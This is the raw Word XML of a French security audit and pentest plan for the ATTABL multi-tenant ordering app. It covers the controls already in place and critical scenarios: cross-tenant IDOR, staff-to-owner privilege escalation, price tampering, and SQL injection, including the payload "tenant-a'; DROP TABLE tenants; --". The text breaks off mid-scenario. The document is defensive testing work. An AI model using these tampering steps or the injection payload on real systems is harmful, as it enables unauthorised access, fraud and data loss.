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A1A2E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTABL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Securite &amp; Scenarios de Penetration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">25 scenarios de test - Classe par severite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Mars 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Etat des lieux securite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit realise sur la base du code source. Voici ce qui est en place et ce qui manque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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4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Controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Statut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Auth (Supabase Auth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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getUser() partout (pas getSession). OAuth + email/password.</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Rate limiting (Upstash Redis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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19+ limiteurs. Sliding window. Toutes les routes publiques.</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Validation Zod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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Toutes les API routes et server actions validees.</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Isolation multi-tenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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tenant_id derive du serveur, jamais du client. RLS actif.</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Verification prix serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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Les prix des commandes sont reverifies cote serveur.</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Headers securite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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X-Frame-Options, HSTS, CSP, nosniff, Permissions-Policy.</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Upload fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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Whitelist MIME, 5MB max, UUID aleatoire, bucket whitelist.</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Stripe webhooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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Signature verifiee. Idempotence.</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Logging + Sentry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OK</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Logger centralise. Pas de console.* en production.</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CORS explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ABSENT</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Repose sur les defaults Supabase/Next.js.</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CSP nonce-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">PARTIEL</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unsafe-inline necessaire pour Stripe. A surveiller.</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Rate limit fail-hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEBEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">FAIBLE</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Si Redis down, le rate limiting est desactive silencieusement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Portail client Stripe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFEBEE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Pas de gestion carte/cancel par le client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Scenarios CRITIQUES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ces scenarios testent les failles qui pourraient compromettre les donnees de TOUS les tenants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-01 : Cross-Tenant Data Access (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant authentifie sur tenant-A essaie d'acceder aux donnees de tenant-B.</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Creer 2 comptes sur 2 tenants differents (tenant-a.attabl.com et tenant-b.attabl.com)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Se connecter sur tenant-a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Intercepter une requete API (ex: GET /api/orders) avec Burp Suite ou les DevTools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Modifier le header x-tenant-slug pour "tenant-b"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Envoyer la requete modifiee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Tenter aussi en modifiant directement le parametre [site] dans l'URL : /sites/tenant-b/admin/orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Tenter d'acceder aux items de menu de tenant-b via l'API publique avec le slug de tenant-b</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Erreur 403 ou 404. Aucune donnee de tenant-b ne doit etre retournee. Le RLS Supabase + la verification serveur doivent bloquer.</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src/app/api/orders/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/middleware.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- Supabase RLS policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-02 : Elevation de privilege (Staff -&gt; Admin -&gt; Owner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un utilisateur staff essaie de s'attribuer des permissions admin ou owner.</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Creer un utilisateur staff sur un tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Intercepter la requete POST /api/permissions ou les server actions admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Modifier le body pour changer son propre role de "staff" a "owner"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter d'acceder aux endpoints admin-only (DELETE user, modify settings)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter de creer un autre admin via POST /api/invitations avec role "owner"</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Erreur 403. Seul le role "owner" peut modifier les permissions. Le serveur derive le role de la session, pas du body.</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src/app/api/permissions/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/actions/admin.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/services/plan-enforcement.service.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-03 : Fraude de prix (Price Tampering)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un client modifie les prix des articles dans sa commande avant de l'envoyer.</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Ouvrir le menu QR d'un tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ajouter des articles au panier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Intercepter la requete POST /api/orders avec les DevTools/Burp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Modifier le prix des items dans le body JSON (ex: 5000 XAF -&gt; 100 XAF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Envoyer la commande modifiee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Verifier si le total en base correspond au prix reel ou au prix modifie</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 serveur recalcule les prix a partir de la base de donnees. Le prix envoye par le client est IGNORE. La commande est creee avec les vrais prix.</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src/app/api/orders/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/services/order.service.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-04 : Injection SQL via Supabase SDK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tenter d'injecter du SQL via les parametres de requete.</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Sur le menu public, intercepter les requetes de recherche ou de filtrage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Injecter du SQL dans les parametres : slug = "tenant-a'; DROP TABLE tenants; --"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
